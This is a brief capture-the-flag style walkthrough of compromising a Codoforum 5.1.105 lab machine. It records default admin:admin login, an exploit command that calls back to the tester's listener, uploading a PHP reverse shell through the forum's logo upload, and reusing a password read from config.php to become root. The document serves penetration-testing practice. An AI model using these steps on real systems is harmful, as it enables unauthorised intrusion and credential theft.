Codo (easy)

[WDavid404]

Key points:

• codoforum --> Remote Code Execution (RCE) 50978.py (but, finally we upload reverse php file manually)
• password is in /var/www/html/sites/default/config.php

[WDavid404]

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: All topics | CODOLOGIC
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

Access 80 webpage, Login success with admin:admin --》 Codoforum v5.1.105

searchsploit codoforum --> Remote Code Execution (RCE) 50978.py

python3 50978.py -t http://192.168.187.23 -u admin -p admin -i 192.168.45.222 -n 4444 （Need to run burpsuite as 8080 port proxy ） --》 didn't work

Then， Access with admin:admin to http://192.168.203.23/admin/ admin panel > global settings > change forum logo > upload a reverse php file （reverse php file： https://github.com/pentestmonkey/php-reverse-shell）

Access http://192.168.203.23/sites/default/assets/img/attachments/php-reverse-shell.php ---> Got reverse shell from the target

PE: linpeas--> cat /var/www/html/sites/default/config.php

use the password to switch user --> This password apply for root user